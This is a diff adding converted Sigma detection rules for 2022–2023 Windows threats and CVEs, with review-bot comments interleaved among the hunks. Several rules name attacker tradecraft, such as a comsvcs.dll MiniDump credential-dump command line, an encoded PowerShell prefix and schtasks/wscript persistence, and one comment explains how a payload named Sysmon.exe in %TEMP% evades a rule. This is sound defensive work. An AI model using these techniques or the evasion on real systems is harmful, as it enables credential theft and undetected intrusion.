+ - Windows\system32\ime\IMEJP\WimBootConfigurations.ini
+ - Windows\system32\ime\IMETC\WimBootConfigurations.ini
+ registry_image:
+ CommandLine|contains: reg add
+ NewProcessName|contains:
+ - windows\system32\filepath2
+ - windows\system32\ime
+ registry_key:
+ CommandLine|contains:
+ - HKEY_LOCAL_MACHINE\software\classes\clsid\{7c857801-7381-11cf-884d-00aa004b2e24}\inprocserver32
+ - HKEY_LOCAL_MACHINE\software\classes\clsid\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\inprocserver32
+ condition: process_creation and (selection or all of registry_*)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
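Review bot: The `selection` branch matches `NewProcessName|contains` against `Physmem.sys` and three `WimBootConfigurations.ini` paths, but `NewProcessName` in 4688 is the image of the created process and a `.sys`/`.ini` file is not launched as a process, so this branch can't fire on Security-log data; the referenced Sentinel query presumably keys these on file paths, which would belong in a `file_event` rule. `registry_image` has the same shape problem: it requires the `reg add` image itself to live under `windows\system32\ime` (or the placeholder-looking `windows\system32\filepath2`), while `reg.exe` sits directly in `System32` — if the upstream query used the initiating process folder, `ParentProcessName|contains:` is the field to convert to. Until that's checked, a comment such as `# NOTE: selection/registry_image paths look like file or parent-folder indicators, not process images — confirm against the Sentinel source` would stop this `level: high` rule from being read as working coverage.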
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-21554/proc_creation_win_exploit_cve_2023_21554_queuejumper.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-21554/proc_creation_win_exploit_cve_2023_21554_queuejumper.yml
new file mode 100644
index 000000000..5521500b4
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-21554/proc_creation_win_exploit_cve_2023_21554_queuejumper.yml
@@ -0,0 +1,39 @@
+title: Potential CVE-2023-21554 QueueJumper Exploitation
+id: 53207cc2-0745-4c19-bc72-80be1cc16b3f
+status: experimental
+description: Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)
+references:
+ - https://research.checkpoint.com/2023/queuejumper-critical-unauthorized-rce-vulnerability-in-msmq-service/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/04/12
+tags:
+ - attack.privilege_escalation
+ - attack.execution
+ - cve.2023.21554
+ - detection.emerging_threats
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ ParentProcessName|endswith: \Windows\System32\mqsvc.exe
+ NewProcessName|endswith:
+ - \cmd.exe
+ - \cscript.exe
+ - \mshta.exe
+ - \powershell.exe
+ - \pwsh.exe
+ - \regsvr32.exe
+ - \rundll32.exe
+ - \schtasks.exe
+ - \wmic.exe
+ - \wscript.exe
+ - \wsl.exe
+ condition: process_creation and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml
new file mode 100644
index 000000000..0b9627f8c
--- /dev/null
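Review bot: The file is placed under `emerging-threats/2022/Exploits/CVE-2022-21554/` while the title, the `cve.2023.21554` tag and the Check Point reference all refer to CVE-2023-21554, so the directory carries a wrong CVE identifier and anyone browsing by CVE or year will not find it; it belongs under `2023/Exploits/CVE-2023-21554/`. The detection itself — `mqsvc.exe` spawning a shell or scripting host — is a clean parent/child pairing, and since I'm not aware of a legitimate reason for the MSMQ service to spawn these children, `falsepositives: Unlikely` would describe it more accurately than `Unknown`.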
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml
@@ -0,0 +1,41 @@
+title: Potential CVE-2022-29072 Exploitation Attempt
+id: 9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3
+status: test
+description: |
+ Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.
+ 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.
+ The command runs in a child process under the 7zFM.exe process.
+references:
+ - https://github.com/kagancapar/CVE-2022-29072
+ - https://twitter.com/kagancapar/status/1515219358234161153
+author: frack113
+date: 2022/04/17
+modified: 2023/02/07
+tags:
+ - attack.execution
+ - cve.2022.29072
+ - detection.emerging_threats
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_img:
+ - NewProcessName|endswith: \cmd.exe
+ - OriginalFileName: Cmd.Exe
+ selection_parent:
+ ParentProcessName|endswith: \7zFM.exe
+ filter_bat:
+ CommandLine|contains:
+ - ' /c '
+ - ' /k '
+ - ' /r '
+ filter_null:
+ CommandLine:
+ condition: process_creation and (all of selection_* and not 1 of filter_*)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml
new file mode 100644
index 000000000..fc80fe972
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml
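Review bot: Because the condition is `all of selection_* and not 1 of filter_*`, `filter_bat` suppresses any `cmd.exe` child of `7zFM.exe` whose command line carries ` /c `, ` /k ` or ` /r `, so the rule alerts only on the argument-less, interactive `cmd.exe` the public PoC spawns and deliberately ignores an attacker who passes `/c <payload>`; that intent should be written down, e.g. `# filter_bat: only the bare cmd.exe spawn from the PoC is alerted on; cmd /c, /k, /r under 7zFM are treated as benign`. `filter_null` additionally drops events with an empty `CommandLine`, so if the converter treats a missing command line (no command-line auditing) as null, such hosts never alert — worth a note beside it. As far as I recall CVE-2022-29072 is listed as disputed, with the 7-Zip maintainer attributing the behaviour to the Windows HTML Help handler rather than a 7z.dll heap overflow, so the description's `This is caused by misconfiguration of 7z.dll and a heap overflow` should be hedged or cite the dispute.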
@@ -0,0 +1,44 @@
+title: Suspicious Sysmon as Execution Parent
+id: 6d1058a4-407e-4f3a-a144-1968c11dc5c3
+status: experimental
+description: Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)
+references:
+ - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120
+ - https://twitter.com/filip_dragovic/status/1590052248260055041
+ - https://twitter.com/filip_dragovic/status/1590104354727436290
+author: Florian Roth (Nextron Systems), Tim Shelton (fp werfault)
+date: 2022/11/10
+modified: 2023/10/23
+tags:
+ - attack.privilege_escalation
+ - attack.t1068
+ - cve.2022.41120
+ - detection.emerging_threats
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ ParentProcessName|endswith:
+ - \Sysmon.exe
+ - \Sysmon64.exe
+ filter_main_generic:
+ NewProcessName|contains:
+ - :\Windows\Sysmon.exe
+ - :\Windows\Sysmon64.exe
+ - :\Windows\System32\conhost.exe
+ - :\Windows\System32\WerFault.exe # When Sysmon crashes
+ - :\Windows\System32\WerFaultSecure.exe # When Sysmon crashes
+ - :\Windows\System32\wevtutil.exe
+ - :\Windows\SysWOW64\wevtutil.exe
+ - \AppData\Local\Temp\Sysmon.exe # When launching Sysmon 32bit version.
+ filter_main_null:
+ NewProcessName:
+ condition: process_creation and (selection and not 1 of filter_main_*)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/BlueSky-Ransomware/win_security_malware_bluesky_ransomware_files_indicators.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/BlueSky-Ransomware/win_security_malware_bluesky_ransomware_files_indicators.yml
new file mode 100644
index 000000000..d463111cc
--- /dev/null
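Review bot: `filter_main_generic` is a `NewProcessName|contains` list, so the entry `\AppData\Local\Temp\Sysmon.exe` excludes any child of Sysmon whose image path contains that substring — under any user's profile and regardless of what binary actually sits there — meaning an attacker exploiting CVE-2022-41120 can name the payload `Sysmon.exe` in `%TEMP%` and walk straight through this `level: high` rule. Since the legitimate case per the comment is the 64-bit Sysmon extracting its 32-bit copy, the exclusion should be as narrow as that flow allows (an exact drop path if it is stable), and the comment should admit the blind spot: `# Bypassable: a payload named Sysmon.exe under %TEMP% is excluded; keep this as narrow as the installer flow needs`. The `conhost.exe` and `wevtutil.exe` entries are tied to fixed System32/SysWOW64 paths and don't have the same weakness.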
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/BlueSky-Ransomware/win_security_malware_bluesky_ransomware_files_indicators.yml
@@ -0,0 +1,35 @@
+title: BlueSky Ransomware Artefacts
+id: eee8311f-a752-44f0-bf2f-6b007db16300
+status: experimental
+description: Detect access to files and shares with names and extensions used by BlueSky ransomware which could indicate a current or previous encryption attempt.
+references:
+ - https://unit42.paloaltonetworks.com/bluesky-ransomware/
+author: j4son
+date: 2023/05/23
+tags:
+ - attack.impact
+ - attack.t1486
+ - detection.emerging_threats
+logsource:
+ product: windows
+ service: security
+detection:
+ security:
+ Channel: Security
+ selection_access_eid:
+ EventID:
+ - 4663
+ - 4656
+ selection_access_data:
+ - ObjectName|endswith: .bluesky
+ - ObjectName|contains: DECRYPT FILES BLUESKY
+ selection_share_eid:
+ EventID: 5145
+ selection_share_data:
+ - RelativeTargetName|endswith: .bluesky
+ - RelativeTargetName|contains: DECRYPT FILES BLUESKY
+ condition: security and (all of selection_access_* or all of selection_share_*)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml
new file mode 100644
index 000000000..4bff8d5dd
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml
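Review bot: 4656/4663 only appear when a SACL for the matching access exists on the files, and 5145 requires the "Audit Detailed File Share" subcategory, so without a `definition:` line this rule looks like it works on a default audit policy when it will produce nothing; the 36884 share-access rule in this same commit shows the pattern with its `definition:` entry. Suggest adding under `logsource`: `definition: 'Requirements: SACLs for file access on monitored paths (4656/4663) and "Object Access > Audit Detailed File Share" (5145) must be enabled'`. A one-line comment that `.bluesky` and `DECRYPT FILES BLUESKY` are post-encryption artefacts would also make clear why the `level: high` hit is a confirmation rather than an early warning.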
@@ -0,0 +1,36 @@
+title: Hermetic Wiper TG Process Patterns
+id: 2f974656-6d83-4059-bbdf-68ac5403422f
+status: test
+description: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022
+references:
+ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia
+author: Florian Roth (Nextron Systems)
+date: 2022/02/25
+modified: 2022/09/09
+tags:
+ - attack.execution
+ - attack.lateral_movement
+ - attack.t1021.001
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection1:
+ NewProcessName|endswith: \policydefinitions\postgresql.exe
+ selection2:
+ - CommandLine|contains:
+ - CSIDL_SYSTEM_DRIVE\temp\sys.tmp
+ - ' 1> \\\\127.0.0.1\ADMIN$\__16'
+ - CommandLine|contains|all:
+ - 'powershell -c '
+ - '\comsvcs.dll MiniDump '
+ - \winupd.log full
+ condition: process_creation and (1 of selection*)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml
new file mode 100644
index 000000000..232ecd0ce
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml
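Review bot: `CSIDL_SYSTEM_DRIVE\temp\sys.tmp` in `selection2` looks like the vendor report's normalised placeholder for the system drive rather than a literal that appears in a real command line, so on raw 4688 `CommandLine` data this entry can never match; `:\temp\sys.tmp` (or just `\temp\sys.tmp`) would catch the actual `C:\temp\sys.tmp`. I can't confirm from this diff whether the converter rewrites `CSIDL_*` tokens — if it doesn't, please adjust the value and add `# CSIDL_SYSTEM_DRIVE is report notation for the system drive letter, not a literal string`. The `powershell -c` + `\comsvcs.dll MiniDump` + `\winupd.log full` alternative is the only branch here that is not a one-off path indicator, so it deserves a comment noting it is the generic LSASS-dump pattern with a campaign-specific output name.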
@@ -0,0 +1,29 @@
+title: Potential Raspberry Robin Dot Ending File
+id: a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a
+status: test
+description: Detects commandline containing reference to files ending with a "." This scheme has been seen used by raspberry-robin
+author: Nasreddine Bencherchali (Nextron Systems)
+references:
+ - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/
+date: 2022/10/28
+modified: 2023/02/05
+tags:
+ - attack.execution
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ # Example 1: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-3f-raspberryrobin-runonce.png
+ # Example 2: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-5f-odbcconf.png
+ # Example 3: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-6f-fauppod-command-line.png
+ CommandLine|re: \\[a-zA-Z0-9]{1,32}\.[a-zA-Z0-9]{1,6}\.[ "']{1} # cannot match on end-of-line because of FPs with bind DNS notation
+ condition: process_creation and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/win_mssql_sp_maggie.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/win_mssql_sp_maggie.yml
new file mode 100644
index 000000000..acaf0e817
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/win_mssql_sp_maggie.yml
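Review bot: In `CommandLine|re: \\[a-zA-Z0-9]{1,32}\.[a-zA-Z0-9]{1,6}\.[ "']{1}` the trailing `{1}` is a no-op quantifier and should be dropped; more substantively, the two `[a-zA-Z0-9]` classes exclude `_`, `-` and spaces, so a dot-terminated name such as `\my_file.ext.` is not matched — if the referenced Microsoft screenshots show such names, widen the classes (e.g. `[a-zA-Z0-9_\-]`). A regex evaluated against every 4688 command line is also relatively costly at volume, and the rule relies on the leading `\\` (a path separator) to keep matches to file references; a comment stating that, e.g. `# anchored on a path separator so bare words and version strings are not matched`, would stop someone "simplifying" it away.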
@@ -0,0 +1,28 @@
+title: MSSQL Extended Stored Procedure Backdoor Maggie
+id: 711ab2fe-c9ba-4746-8840-5228a58c3cb8
+status: test
+description: This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server
+references:
+ - https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01
+author: Denis Szadkowski, DIRT / DCSO CyTec
+date: 2022/10/09
+modified: 2022/10/09
+tags:
+ - attack.persistence
+ - attack.t1546
+ - detection.emerging_threats
+logsource:
+ product: windows
+ service: application
+detection:
+ application:
+ Channel: Application
+ selection:
+ Provider_Name: MSSQLSERVER
+ EventID: 8128
+ Message|contains: maggie
+ condition: application and selection
+falsepositives:
+ - Legitimate extended stored procedures named maggie
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml
new file mode 100644
index 000000000..6057c3acd
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml
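Review bot: `Provider_Name: MSSQLSERVER` matches only the default instance; named SQL Server instances write Application events under the source `MSSQL$<InstanceName>`, so a Maggie load on any named instance is missed by this `level: high` rule. `Provider_Name|startswith: MSSQL` keeps the default instance and covers the named ones, and a comment such as `# named instances log as MSSQL$<name>` records why. `Message|contains: maggie` is also a loose substring over the whole 8128 text; if the DCSO write-up names the DLL or the exported procedure more precisely, anchoring on that would shrink the false-positive case already listed.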
@@ -0,0 +1,32 @@
+title: Potential ACTINIUM Persistence Activity
+id: e1118a8f-82f5-44b3-bb6b-8a284e5df602
+status: test
+description: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.
+references:
+ - https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations
+author: Andreas Hunkeler (@Karneades)
+date: 2022/02/07
+modified: 2023/03/18
+tags:
+ - attack.persistence
+ - attack.t1053
+ - attack.t1053.005
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains|all:
+ - schtasks
+ - create
+ - wscript
+ - ' /e:vbscript'
+ condition: process_creation and selection
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml
new file mode 100644
index 000000000..5c0b098dc
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml
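Review bot: The token carrying the signal here is `' /e:vbscript'`, and a one-line comment on why it matters would help whoever tunes this `level: high` rule: as I understand the Windows Script Host switch, `/e:` forces the script engine, which is what lets the task run a script whose file has no `.vbs` extension — e.g. `# /e:vbscript pins the engine so the dropped file needs no .vbs extension`. Because all four strings must appear in one 4688 command line, the rule only sees tasks created through the `schtasks` command line and not via the Task Scheduler API or COM; that coverage limit fits the reported tradecraft but should be stated in the description so nobody treats a miss as absence of the technique.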
@@ -0,0 +1,30 @@
+title: MERCURY APT Activity
+id: a62298a3-1fe0-422f-9a68-ffbcbc5a123d
+status: experimental
+description: Detects suspicious command line patterns seen being used by MERCURY APT
+references:
+ - https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/
+author: Florian Roth (Nextron Systems)
+date: 2022/08/26
+modified: 2023/03/10
+tags:
+ - attack.execution
+ - attack.t1059.001
+ - attack.g0069
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_base:
+ CommandLine|contains|all:
+ - -exec bypass -w 1 -enc
+ - UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA # Start-Job -ScriptBlock
+ condition: process_creation and (all of selection*)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml
new file mode 100644
index 000000000..32d19b72f
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml
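Review bot: The inline comment `# Start-Job -ScriptBlock` undersells what the base64 literal pins: decoded as UTF-16LE it reads `Start-Job -ScriptBlock {(saps ("p`, so the match holds only when the encoded command begins with exactly that text — one leading character (a space, a different alias than `saps`) shifts the base64 alignment and produces an entirely different string. Suggest the comment say so: `# UTF-16LE base64 of 'Start-Job -ScriptBlock {(saps ("p' — alignment-sensitive, matches only when the encoded command starts with exactly this prefix`. Given that brittleness, it's worth confirming that a generic encoded-PowerShell rule (`-exec bypass -w 1 -enc` is itself a strong signal) covers the variants this one will miss.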
@@ -0,0 +1,47 @@
+title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)
+id: 1ddaa9a4-eb0b-4398-a9fe-7b018f9e23db
+related:
+ - id: f8987c03-4290-4c96-870f-55e75ee377f4
+ type: similar
+status: experimental
+description: |
+ Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
+references:
+ - https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html
+ - https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment
+ - https://github.com/ForceFledgling/CVE-2023-22518
+author: Andreas Braathen (mnemonic.io)
+date: 2023/11/14
+tags:
+ - detection.emerging_threats
+ - attack.execution
+ - attack.t1059
+ - attack.initial_access
+ - attack.t1190
+ - cve.2023.22518
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_parent:
+ ParentCommandLine|contains: confluence
+ ParentProcessName|endswith:
+ - \tomcat8.exe
+ - \tomcat9.exe
+ - \tomcat10.exe
+ selection_child:
+ # Note: Only children associated with known campaigns
+ - NewProcessName|endswith:
+ - \cmd.exe
+ - \powershell.exe
+ - OriginalFileName:
+ - Cmd.Exe
+ - PowerShell.EXE
+ condition: process_creation and (all of selection_*)
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml
new file mode 100644
index 000000000..ce540193e
--- /dev/null
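Review bot: `selection_parent` requires `ParentCommandLine|contains: confluence`, but Security event 4688 exposes the parent only as `ParentProcessName` and carries no parent command line field, so on this log source `all of selection_*` can never be satisfied and the rule is dead as converted. Dropping that line, or replacing it with something 4688 does carry (e.g. `ParentProcessName|contains: confluence`, if the Confluence Tomcat install path contains the word on the systems you monitor), makes it fire; add `# 4688 has no ParentCommandLine; the parent is identified by image path only` so the weakened check is understood. The `OriginalFileName` alternative in `selection_child` is likewise not a 4688 field, but it is harmless here because the `NewProcessName|endswith` alternative covers the same two binaries.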
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml
@@ -0,0 +1,33 @@
+title: Outlook Task/Note Reminder Received
+id: fc06e655-d98c-412f-ac76-05c2698b1cb2
+status: experimental
+description: Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation.
+references:
+ - https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/04/05
+modified: 2023/08/17
+tags:
+ - attack.persistence
+ - attack.t1137
+ - cve.2023.23397
+ - detection.emerging_threats
+logsource:
+ category: registry_set
+ product: windows
+detection:
+ registry_set:
+ EventID: 4657
+ Channel: Security
+ selection:
+ ObjectName|contains|all:
+ - \SOFTWARE\Microsoft\Office\
+ - \Outlook\
+ ObjectName|contains:
+ - \Tasks\
+ - \Notes\
+ condition: registry_set and selection
+falsepositives:
+ - Legitimate reminders received for a task or a note will also trigger this rule.
+level: low
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml
new file mode 100644
index 000000000..f8939caee
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml
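Review bot: 4657 is written only when the "Audit Registry" subcategory is on and a SACL covering Set Value exists on the Outlook keys, so without a `definition:` line this reads as default-on telemetry when it is not; the sibling 23397 rule in this commit documents its SACL requirement in exactly that way. Suggest under `logsource`: `definition: 'Requirements: "Object Access > Audit Registry" enabled and a SACL for Set Value on HKCU\SOFTWARE\Microsoft\Office\*\Outlook\'`. Also, `ObjectName|contains|all` plus `\Tasks\`/`\Notes\` matches any value set anywhere under those subtrees, not only the reminder-related ones — if the Microsoft guidance names specific value names, matching on 4657's `ObjectValueName` would sharpen this `level: low` signal.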
@@ -0,0 +1,39 @@
+title: CVE-2023-23397 Exploitation Attempt
+id: 73c59189-6a6d-4b9f-a748-8f6f9bbed75c
+status: experimental
+description: Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.
+author: Robert Lee @quantum_cookie
+date: 2023/03/16
+modified: 2023/03/22
+references:
+ - https://www.trustedsec.com/blog/critical-outlook-vulnerability-in-depth-technical-analysis-and-recommendations-cve-2023-23397/
+tags:
+ - attack.credential_access
+ - attack.initial_access
+ - cve.2023.23397
+ - detection.emerging_threats
+logsource:
+ service: security
+ product: windows
+ definition: 'Requirements: SACLs must be enabled for "Query Value" on the registry keys used in this rule'
+detection:
+ security:
+ Channel: Security
+ selection:
+ EventID:
+ - 4656
+ - 4663
+ ProcessName|endswith: \OUTLOOK.EXE
+ # Example: \REGISTRY\MACHINE\SYSTEM\CurrentControlSet001\Services\WebClient\NetworkProvider
+ ObjectName|contains|all:
+ - \REGISTRY\MACHINE\SYSTEM
+ - Services\
+ ObjectName|endswith:
+ - WebClient\NetworkProvider
+ - LanmanWorkstation\NetworkProvider
+ AccessList|contains: '%%4416' # "Query key value"
+ condition: security and selection
+falsepositives:
+ - Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml
new file mode 100644
index 000000000..a6a65c13c
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml
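Review bot: The `falsepositives` entry says `Searchprotocolhost.exe likes to query these registry keys`, but `selection` already pins `ProcessName|endswith: \OUTLOOK.EXE`, so those events cannot match this rule as written — the note is stale or predates the process filter, and should either be removed or restated as the real FP (Outlook itself resolving a UNC/WebDAV path in a legitimate message). The example comment also has a typo: the key lives under `\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WebClient\NetworkProvider` (there is no `CurrentControlSet001`). Finally, `level: critical` for a registry query that precedes any confirmed outbound SMB/WebDAV connection seems high; the SMB-connectivity rule in this commit is the more reliable escalation, and a cross-reference in the description would help analysts chain the two.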
@@ -0,0 +1,53 @@
+title: Potential CVE-2023-23397 Exploitation Attempt - SMB
+id: de96b824-02b0-4241-9356-7e9b47f04bac
+status: experimental
+description: Detects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397.
+references:
+ - https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/04/05
+tags:
+ - attack.exfiltration
+ - cve.2023.23397
+ - detection.emerging_threats
+logsource:
+ product: windows
+ service: smbclient-connectivity
+detection:
+ smbclient_connectivity:
+ Channel: Microsoft-Windows-SmbClient/Connectivity
+ selection:
+ # Author Note: You could adapt this rule to use the "ServerName" field and uncomment the commented EventIDs. But you need to provide your own filter for "trusted server names"
+ EventID:
+ # - 30800 # The server name cannot be resolved. (Doesn't contain the "ServerAddress" field)
+ - 30803 # Failed to establish a network connection.
+ - 30804 # A network connection was disconnected.
+ - 30806 # The client re-established its session to the server.
+ # - 31001 # Error (Doesn't contain the "ServerAddress" field)
+ filter_main_local_ips:
+ ServerAddress|startswith:
+ - '10.' # 10.0.0.0/8
+ - 192.168. # 192.168.0.0/16
+ - 172.16. # 172.16.0.0/12
+ - 172.17.
+ - 172.18.
+ - 172.19.
+ - 172.20.
+ - 172.21.
+ - 172.22.
+ - 172.23.
+ - 172.24.
+ - 172.25.
+ - 172.26.
+ - 172.27.
+ - 172.28.
